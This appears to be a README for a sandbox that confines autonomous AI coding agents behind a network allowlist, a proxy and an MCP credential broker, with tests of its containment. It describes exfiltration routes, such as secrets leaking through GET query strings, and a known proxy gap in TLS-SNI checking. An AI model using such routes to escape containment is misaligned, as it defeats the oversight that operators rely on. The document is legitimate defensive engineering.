A capability-confined sandbox for running AI coding agents in YOLO mode. Instead of trusting the agent to behave, you make harm structurally impossible. The worst a fully compromised or prompt-injected agent can do is open a pull request on a private repo — it cannot exfiltrate secrets, reach arbitrary hosts, or touch the cloud directly.
This repo is two things:
PROMPT.md— the brief that defines the system. This is the artifact that matters: hand it to a capable coding agent and it can build a runtime like this one. It's a refined version of the original idea with the security mistakes corrected.sample-implementation/— one working, tested implementation of that brief (Docker + Squid + a stdlib MCP server), with a test suite that proves the security properties hold.
- The agent sits on an internal-only network: it has no internet route at all.
- Its only way out is the proxy, which allows a short list of trusted domains and
denies everything else. This — not an "allow GET / block POST" filter — is what
actually stops exfiltration (a
GET evil.com/?secret=...leaks just fine). - The cloud credential lives only in the MCP server. There is no
azCLI in the agent, so the only path to the cloud is through MCP tools that return derived, scrubbed results. The agent never sees the secret.
See PROMPT.md for the two-layer mediation model (proxy floor + MCP high-trust lane)
and the full acceptance criteria.
cd sample-implementation
# Build and start the three containers (agent, proxy, mcp-server)
docker compose build
docker compose up -d
docker compose ps # all three should be "Up"
# Prove the security properties (runs commands inside the agent container)
./tests/run-tests.sh
# Exec in and play the part of the agent
docker exec -it mar-agent bash
# curl https://api.github.com/zen # allowed
# curl https://example.com # blocked by the proxy
# mcp_call azure_whoami # cloud access without the credential
# mcp_call web_fetch url=https://api.github.com/zen
# Watch egress decisions live
docker exec mar-proxy tail -f /var/log/squid/access.log
# Optional: give the agent a real GitHub PAT (read + create-PR, private repos)
GH_TOKEN=ghp_xxx docker compose up -d
./tests/run-tests.sh # now also exercises GitHub access
# Tear down
docker compose down| # | Property |
|---|---|
| 1 | Agent has no direct internet route (bypassing the proxy fails) |
| 2 | Egress is domain-allowlisted (github allowed, example.com denied) |
| 3 | The cloud credential is never visible to the agent |
| 4 | A vulnerable tool's secret leak is scrubbed by the MCP server |
| 5 | Exfiltration blocked — GET and POST to a non-allowlisted host fail |
| 6 | No az CLI in the agent; GitHub access is scoped (PAT) |
This is a POC that demonstrates the model, not a finished product. Notably: the proxy
trusts the CONNECT hostname without TLS-SNI verification (production wants
ssl_bump peek + SNI allowlisting), the MCP server is the trusted base and must be
kept small and audited, and the MCP transport here is a minimal hand-rolled JSON-RPC
subset rather than the official SDK over Streamable HTTP. These are called out in
PROMPT.md and in code comments so they aren't mistaken for solved problems.
